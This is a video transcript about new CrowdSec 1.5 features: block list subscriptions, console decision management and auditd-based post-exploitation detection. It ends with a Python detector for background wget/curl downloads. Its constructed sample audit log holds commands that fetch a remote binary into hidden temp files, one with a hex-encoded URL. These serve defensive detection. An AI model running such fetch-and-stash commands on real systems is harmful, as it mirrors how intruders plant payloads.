CrowdSec 1.5 Gains New Features - Exploring Block Lists, Post Exploitation Behavior & More!

Captions
Hello again everyone, and welcome back to Learn Linux TV. In today's video, what we're going to do is take a look at CrowdSec again, because a new version is out with some brand new features. CrowdSec is something that I've covered on this channel before, and it's a very interesting solution that can block malicious IP addresses from reaching your Linux server. That alone isn't something that sets CrowdSec apart from others; another solution, Fail2ban, does exactly that, and I've covered it on this very channel. But unlike Fail2ban, what sets CrowdSec apart from other solutions is the fact that it uses crowd intelligence to make its decisions. The way that this intelligence factors into CrowdSec is such that if a server out there has CrowdSec installed and then it becomes the target of a malicious attempt, maybe a hacking attempt or something like that, then CrowdSec analyzes that traffic and makes a decision. If it determines that the activity is in fact malicious, it's going to send that information to its central database, and then all the other CrowdSec installations out there will benefit from that same information, because if you mess with one CrowdSec install, well, you're messing with all of them. Now of course that was overly simplified; I mean, I've covered this topic on this channel a few times in the past, so if you want to learn even more about CrowdSec then check out those videos. But what we're going to do in today's video is talk about CrowdSec 1.5, which is the latest version, and with it comes some very interesting features.

Now I want to be clear before we get started that this is a tutorial video, and it is not a review or endorsement. I've talked about CrowdSec in previous videos on the channel, so if you want to find out what my opinion is of this service, there's several videos that you can watch to find out exactly that. I have a video that shows you how to install it in depth; I even have a video that goes over the console feature that's optional but is a good value add to the service. So there's no shortage of opinions when it comes to CrowdSec on this channel; check out any of those other videos if you want to find out what I think or if you just want to get started. If you're already a CrowdSec user, then, well, you can check out the new features as I'm going to show you in this video, and you never know, maybe some of these features will add a lot of value to you and/or your organization. So what I want to do right now is dive into CrowdSec. Let's get started and check out what's coming in 1.5.

First up, what I'm going to do is give you a quick refresher on CrowdSec. Like I mentioned during the intro, CrowdSec is a security service that you can install on your Linux server that collects information on malicious activity, and it does that to build a threat intelligence database of malicious IP addresses. Every server with CrowdSec installed will benefit from that intelligence. For example, if a threat actor attempts to attack a server that has CrowdSec installed, then that IP address will be blocked right there at the server, but it doesn't stop there. From there, that IP address will be submitted to CrowdSec's threat intelligence database, and all servers that have CrowdSec installed will also have information about that IP address and know exactly how to handle it if they happen to see it.

CrowdSec is composed of the security engine as well as one or more remediation components. The security engine doesn't do any blocking in and of itself, but what it does do is keep track of the traffic that it sees, and it's able to recommend that an IP be blocked if it determines that the activity is potentially malicious. You could think of the security engine as a silent observer: it keeps a watchful eye on network traffic, and what it's able to do is make a decision on how to handle that traffic. Remediation components, on the other hand, take action. What they do is keep an eye on the CrowdSec security engine, and if the engine recommends an IP to be blocked, then the remediation components that you have installed will take that instruction as a command and execute it. In addition, there's also a third component of CrowdSec, the CrowdSec Console. The console isn't required, but it is something that you can opt into if you want a dashboard where you can easily see the status of CrowdSec on your servers. The engine as well as the remediation components are completely open source, and in addition to that, there's no account required to use CrowdSec. That means if you want to install CrowdSec on 10,000 servers, go right ahead; you don't have to call anybody, you don't have to sign up for anything, just install it. Now the console does require an account, on the other hand, but there's a free version for enthusiasts and community members as well as a paid version for enterprise customers, and since it's free, well, you may as well install it. As we're going to see later on in the video, there's good reason to do so, because some of the features we're going to talk about require the console. But how do you go about getting started with CrowdSec? Well, what I'll do is leave a card on the screen right now for a previous video that goes over exactly that. If you want to get started with CrowdSec, then check out that video; you can get it installed and then come back here and we'll continue. But what I'm going to do right now is show off some of the new features in CrowdSec 1.5, so let's take a look.

To show you the new features, what I'm going to do is take us back to the CrowdSec Console, and that's what you're seeing on this screen right now. In fact, I've covered the CrowdSec Console in the most recent video I've done about CrowdSec up until this one, and like I mentioned earlier, the CrowdSec Console is something that you can opt into. What it does is it gives you a single pane of glass that you can use to get a look at all of your servers that have CrowdSec installed. But again, this is an optional component; you can use CrowdSec without it, but the value that the console adds is something you should probably take advantage of. The primary features are free anyway, so why not? For those of you that haven't seen the CrowdSec Console before, well, here you go. This optional service gives you a complete overview of all of the nodes that you've installed CrowdSec onto. However, in 1.5 the console adds additional functionality, so it's not just about viewing metrics; there's more features that you can take advantage of in order to better manage your fleet of servers, and that's what 1.5 helps you accomplish.

The first feature that I'd like to show you guys is the fact that now you can subscribe to block lists within CrowdSec. Now the thing is, you've always had a block list within CrowdSec; I mean, that's at the heart and soul of what CrowdSec does. It has a database of IP addresses that are known to be malicious, and that essentially is a block list, and before, that was essentially all you had. You could add IP addresses yourself manually through the cscli command, as I've shown you in previous videos, but now you can subscribe to additional block lists within CrowdSec. Now we can see the option for block lists right here; it's right here in the menu. So when I click on it, what it'll do is bring me to a list of block lists that I could add to my server. As you can see, there's a number of block lists here already, and to take advantage of one, all you have to do is click on the Subscribe button. The way that this is set up is, if you're using the free version of the CrowdSec Console, then as part of that account you will have access to two block list subscriptions for free. The enterprise account will give you additional functionality, but at the very least you will have access to two block lists, so you may as well subscribe to those, as it's provided as part of your account. The way that this is set up is fairly straightforward: right here we have a list of block lists that you can subscribe to, and every now and then a new block list might be made available, so there's a refresh button right here. You could click on that, and if any block list was made available that wasn't there before, then it's going to be there in the list as soon as you refresh it. But scrolling down, we can see a number of block lists that are available. Like I mentioned, as part of your free account you can subscribe to any two of these block lists, the only exception being the first three; they're tagged with premium, as you can see, so those are for enterprise users only. But after the first three, when you scroll down, you'll see that there's a number of block lists that are available to you even without an enterprise account, so you can subscribe to any two of these block lists.

For more information, you can click on any one of these, and what that's going to do is take you to a screen that's going to give you more detail about that block list. For example, we have a description right here, but what's also interesting is we have a count of IP addresses. So as of the time I'm recording this video, this particular block list has 7,815 IPs as part of the list. But that's not all; you could also see the rate of change, and that's important. When you subscribe to a block list, you want to make sure that it's maintained; otherwise, I mean, why bother, right? So here we can see how active a block list is. For example, right here we see that this particular list has a 48 change rate when it comes to activity within the last month. It also shows us right here how much change this particular list has seen in the last couple of days. We also see the last update time; this particular list was updated 14 hours ago as of the time I'm recording this video. But anyway, what I'm going to do is subscribe one of my instances to this list, so I'll click right here to add an instance. It's going to give me a list of all the servers that have registered with the console. So maybe I want to prevent my RSS server from seeing one of those attacks from any of the IPs within that list, so what I'll do is click on it right here, and then we could choose what kind of block we want this particular server to have. So essentially we can outright ban the IP addresses within that list, or we could show them a captcha, so that way they can still access the server, but in order to do so they are going to have to solve a captcha. That's not going to necessarily prevent anyone from getting into the server, but it is going to make it take a lot longer, so that could be an option if that's something that you want to do. There's also a custom option here, but I'm not going to go over that in this video. What I'm going to do right now is just outright ban everyone that's a part of this list. This is not something that I generally allow other people to access; this is my RSS server, so I'm just going to click ban right there and then I'm going to click save. Now pay special attention, though: on the bottom there, in bold, it says that this will be effective in up to two hours after your next community blocklist poll. So just keep in mind that the changes may not show up immediately, but we definitely want to subscribe to some block lists to take advantage of the features. So I'll click save, and as we can see right here, we have this particular server that's being subscribed to that block list. It's as simple as that.

Now going back to the main page here, we can see that I have one free block list subscription; I have one more remaining. If I scroll down, I could choose another block list, and you know what, I'm going to subscribe to this one right here. From the description down here, it's looking like this is going to help block port scanners, and there's currently over 8,000 IPs within this list, so that's something I definitely want to benefit from. So I will subscribe to that one as well. You can either click anywhere in here to view more information about the block list or go right to the Subscribe button that's right here on the right, so I'll click on that, and then what I'll do is add the same instance, my RSS server. I also need to choose the desired result as well, so I'll select ban yet again, and as you can see, the RSS server is now subscribed to that block list. How cool is that? So as you can see, you can now subscribe to block lists within CrowdSec 1.5.

But that's not the only IP related feature we're going to look at in today's video. The next thing that I would like to show you guys is real-time decision management, and it's another feature of CrowdSec 1.5, so let's take a look. Now what we'll see right here in this menu is a list of decisions, hence the name. Even blocking your IP address if you mess up the password enough times, that's a decision, and what you could do here is remove a decision in the case that something was blocked that shouldn't have been. But another thing you could do here is be proactive. If there's an IP address you definitely want to block for whatever reason, and you want to do that ahead of time before it becomes a problem, you could click add a decision right here. You could type in the IP address, you could choose what you want done if that particular IP address is found trying to access your servers, and you can also choose the duration as well: four hours, eight hours, or so on. After that time passes, then the decision is going to be deleted. And then what you could do is choose the target for where you want this rule to apply. Now as you've just seen, there's a decisions tab within the console, and that's where you go to take advantage of real-time decision management. But one thing that I want to point out right now is that depending on when you are watching this video, that tab might not be present within your account, and the reason for that is because it's currently considered beta and is expected to roll out soon. So if you don't see that yet, just hold on a bit; you will see that before too long, because it's going to roll out very soon. So I don't have an IP address that I want to block right now. I would add my own IP address here, but I don't want to do that because then I'd lock myself out. But I think you get the idea: if there's an IP address that you want to block within CrowdSec, you could do that right here from the console instead of only being able to do it from the command line.

Now let's switch gears and talk about another new feature in CrowdSec 1.5: post exploitation behaviors. If a threat actor ends up getting into your server anyway, then post exploitation behavior is something you might benefit from. So this is one of those things that you'll hope that you'll never have a use for, but if you do, you'll be glad it's there. After your server has been compromised, what you could do is use post exploitation checks to see if there's any residual users or processes running that probably shouldn't be. This new feature utilizes something called auditd, which is a service you can run on your Linux server. That's not specific to CrowdSec, but it does present a great mechanism through which to view important system events. If you haven't heard of auditd before, it provides configurable logging for more or less anything, and here's an example of what that might look like. With the example collection you are seeing, we're focusing on execve, but you can monitor changes to your file system and more. The existence of this feature means that CrowdSec is not only relevant when it comes to protecting attacks on the network; it can also assist with compliance, hardening, defense in depth, as well as lateral movement. Those are just example scenarios, and this is expected to expand further over time. So auditd definitely contains a wealth of knowledge, and that allows a solution like CrowdSec to hook into that and make decisions based on that, and that's what this new feature does. As for an example of what a post-exploitation behavior might be, imagine a background process that's downloading something. I mean, I've used wget in the past to download many things, and I've shown you how to use wget on this very channel. It's a great way to download something if you need to, but if a background process is using wget or some other command to download a binary from a remote server, that's a little suspicious, especially if you're not logged into the server at the time, and that's one of the things that post exploitation behavior can detect. This might help you find some of the things that are still running in the background even after the threat is neutralized.

There's also a brand new block list API, and the reason why I'm not able to show you this is because I don't have any code that I've written that can take advantage of such a feature. But I do want to make you guys aware of this just in case you do write code or use the API in any kind of way. My understanding is that with the new block list API there's going to be less overhead, and that's very important, considering if you subscribe to a lot of block lists with some services, that could slow you down. But the block list has been redone to make it a point to not slow you down if you go ahead and subscribe to block lists, and it's supposed to be faster overall. Now I can't confirm or deny that this is the case, because again, I don't have a test case for this, but the fact that they're mentioning a speed increase, well, I think that's noteworthy and I wanted to make you aware of that.

Now I want to be clear that these are not the only new features within CrowdSec 1.5. If you are already using CrowdSec, then these are some of the features that you have to look forward to. If you are not using CrowdSec, then of course you could check out my earlier videos; you can find out if this is a solution that's right for you based on that information. There's all kinds of information on my channel about CrowdSec, and it's something that I use personally, so I like to always make these videos available to you guys whenever I upgrade to something, and that's exactly what I'm doing here, because, well, I'm using CrowdSec 1.5 in production right now. But if nothing else, if you're currently a CrowdSec user, then you have a lot to look forward to in 1.5, and you just got a taste of it in this video. Anyway, thank you guys so much for checking out this video. I really appreciate it. Definitely click that like button if this video has helped you out, and I will see you in the next video.
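The background-download scenario the video describes, as an added example that is not from the video and not CrowdSec's own post-exploitation scenarios: a small Python scanner over auditd execve records that flags wget or curl runs fetching a URL while the process has no login session (auditd writes `auid=4294967295` when the login uid is unset) or no controlling terminal (`tty=(none)`). It assumes auditd is already recording execve calls, for instance with a rule such as `-a always,exit -F arch=b64 -S execve -k exec`; the key name `exec`, the log lines, the addresses and the paths below are all constructed for this example.

```python
"""Flag downloads started by processes with no login session, from auditd execve records."""
import re
from dataclasses import dataclass
from typing import Dict, List

# auditd writes this value for auid/ses when the process is not tied to a
# login session (daemons, cron jobs, processes spawned after an exploit).
UNSET_ID = "4294967295"
DOWNLOADERS = {"wget", "curl"}
URL_SCHEMES = ("http://", "https://", "ftp://")

MSG_RE = re.compile(r"msg=audit\((\d+\.\d+):(\d+)\)")   # timestamp:serial shared by an event's records
KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')            # key=value pairs, quoted or bare

# Constructed sample auditd output for this example (not real captured data).
# Each execve yields a SYSCALL record and an EXECVE record with the same msg=audit(...) id.
SAMPLE_AUDIT_LOG = """\
type=SYSCALL msg=audit(1687270001.123:4001): arch=c000003e syscall=59 success=yes exit=0 ppid=1 pid=2201 auid=4294967295 uid=33 gid=33 euid=33 tty=(none) ses=4294967295 comm="wget" exe="/usr/bin/wget" key="exec"
type=EXECVE msg=audit(1687270001.123:4001): argc=5 a0="wget" a1="-q" a2="-O" a3="/tmp/.cache" a4="http://203.0.113.10/update.bin"
type=SYSCALL msg=audit(1687270050.456:4002): arch=c000003e syscall=59 success=yes exit=0 ppid=1800 pid=2250 auid=1000 uid=1000 gid=1000 euid=1000 tty=pts0 ses=3 comm="wget" exe="/usr/bin/wget" key="exec"
type=EXECVE msg=audit(1687270050.456:4002): argc=2 a0="wget" a1="https://releases.example.org/tool.tar.gz"
type=SYSCALL msg=audit(1687270090.789:4003): arch=c000003e syscall=59 success=yes exit=0 ppid=1 pid=2300 auid=4294967295 uid=0 gid=0 euid=0 tty=(none) ses=4294967295 comm="ls" exe="/usr/bin/ls" key="exec"
type=EXECVE msg=audit(1687270090.789:4003): argc=2 a0="ls" a1="/var/log"
type=SYSCALL msg=audit(1687270120.321:4004): arch=c000003e syscall=59 success=yes exit=0 ppid=1450 pid=2310 auid=4294967295 uid=0 gid=0 euid=0 tty=(none) ses=4294967295 comm="curl" exe="/usr/bin/curl" key="exec"
type=EXECVE msg=audit(1687270120.321:4004): argc=5 a0="curl" a1="-fsSL" a2="-o" a3="/var/tmp/.x" a4=68747470733A2F2F3230332E302E3131332E32302F612062
"""


@dataclass
class ExecEvent:
    event_id: str
    pid: str
    exe: str
    auid: str
    tty: str
    argv: List[str]


def _unquote(value: str) -> str:
    return value[1:-1] if len(value) >= 2 and value[0] == value[-1] == '"' else value


def _decode_arg(value: str) -> str:
    """EXECVE arguments containing spaces or control characters are written unquoted as hex."""
    if value.startswith('"'):
        return _unquote(value)
    if len(value) % 2 == 0 and re.fullmatch(r"[0-9A-Fa-f]+", value):
        return bytes.fromhex(value).decode("utf-8", errors="replace")
    return value


def parse_exec_events(log_text: str) -> List[ExecEvent]:
    """Pair each EXECVE record with its SYSCALL record via the shared audit event id."""
    syscall: Dict[str, Dict[str, str]] = {}
    execve: Dict[str, Dict[str, str]] = {}
    for line in log_text.splitlines():
        m = MSG_RE.search(line)
        if not m:
            continue
        fields = dict(KV_RE.findall(line))
        bucket = {"SYSCALL": syscall, "EXECVE": execve}.get(fields.get("type", ""))
        if bucket is not None:
            bucket[m.group(2)] = fields
    events = []
    for event_id, ev in execve.items():
        sc = syscall.get(event_id, {})
        argc = int(ev.get("argc", "0"))
        argv = [_decode_arg(ev[f"a{i}"]) for i in range(argc) if f"a{i}" in ev]
        events.append(ExecEvent(event_id, _unquote(sc.get("pid", "?")), _unquote(sc.get("exe", "?")),
                                _unquote(sc.get("auid", UNSET_ID)), _unquote(sc.get("tty", "(none)")), argv))
    return events


def find_background_downloads(log_text: str) -> List[dict]:
    """Return downloader executions that fetch a URL without a login session or terminal."""
    findings = []
    for ev in parse_exec_events(log_text):
        tool = ev.argv[0].rsplit("/", 1)[-1] if ev.argv else ""
        if tool not in DOWNLOADERS:
            continue
        urls = [a for a in ev.argv if a.lower().startswith(URL_SCHEMES)]
        if not urls:
            continue
        reasons = []
        if ev.auid == UNSET_ID:
            reasons.append("no login uid (auid unset)")
        if ev.tty == "(none)":
            reasons.append("no controlling terminal")
        if reasons:  # an interactive user running wget from a shell is not reported
            findings.append({"event_id": ev.event_id, "pid": ev.pid, "exe": ev.exe,
                             "url": urls[0], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in find_background_downloads(SAMPLE_AUDIT_LOG):
        print(f"event {f['event_id']} pid {f['pid']} {f['exe']} -> {f['url']}: {', '.join(f['reasons'])}")
```

Of the four constructed executions, only the two run without a login uid and terminal are reported; the interactive `wget` from a user's shell and the `ls` are left alone, which is the "nobody was logged in at the time" distinction the video draws.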
Info
Channel: Learn Linux TV
Views: 11,262
Keywords: Linux, Ubuntu, Debian, CrowdSec, Security, Linux Security, Cloud Computing, Server Hardening, Intrusion Prevention, Crowd Sec, open-source, security solution, crowdsec tutorial, crowdsec 1.5, crowdsec 2023
Id: aV1RDXwswN8
Length: 17min 36sec (1056 seconds)
Published: Tue Jun 20 2023